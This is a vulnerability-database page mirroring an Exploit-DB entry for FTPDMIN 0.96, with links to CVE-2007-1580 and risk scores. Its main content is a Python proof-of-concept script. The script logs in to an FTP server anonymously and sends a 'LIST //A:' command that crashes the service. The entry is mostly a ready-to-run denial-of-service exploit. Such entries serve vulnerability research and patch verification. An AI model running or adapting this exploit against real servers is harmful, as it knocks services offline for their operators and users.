Lucene search
+L

FTPDMIN 0.96 - 'LIST' Remote Denial of Service

🗓️ 20 Mar 2007 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

FTPDMIN 0.96 'LIST' Remote Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-1580
21 Mar 200723:00
cve
cvelist
Cvelist
CVE-2007-1580
21 Mar 200723:00
cvelist
euvd
EUVD
EUVD-2007-1574
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-1580
21 Mar 200723:19
nvd
prion
Prion
Buffer overflow
21 Mar 200723:19
prion
securityvulns
securityvulns
FTPDMIN special DOS device access
29 Mar 200700:00
securityvulns
# usr/bin/python

import socket
import time

print
"-----------------------------------------------------------------------"
print "# FTPDMIN v. 0.96 LIST Denial of Service"
print "# url: http://www.sentex.net/~mwandel/ftpdmin/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print
"-----------------------------------------------------------------------\n"

buff = "//A:"

user = "anonymous"
password = "shinnai"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   conn = s.connect(("127.0.0.1",21))
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('USER %s\r\n' % user)
   print "Client -> USER " + user
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('PASS %s\r\n' % password)
   print "Client -> PASS " + password
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('LIST %s\r\n' % buff)
   print "Client -> LIST " + buff
   d = s.recv(1024)
   print d
   time.sleep(2)

except:
   print "- Unable to connect. exiting."

# milw0rm.com [2007-03-20]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Mar 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.3
EPSS0.02403
26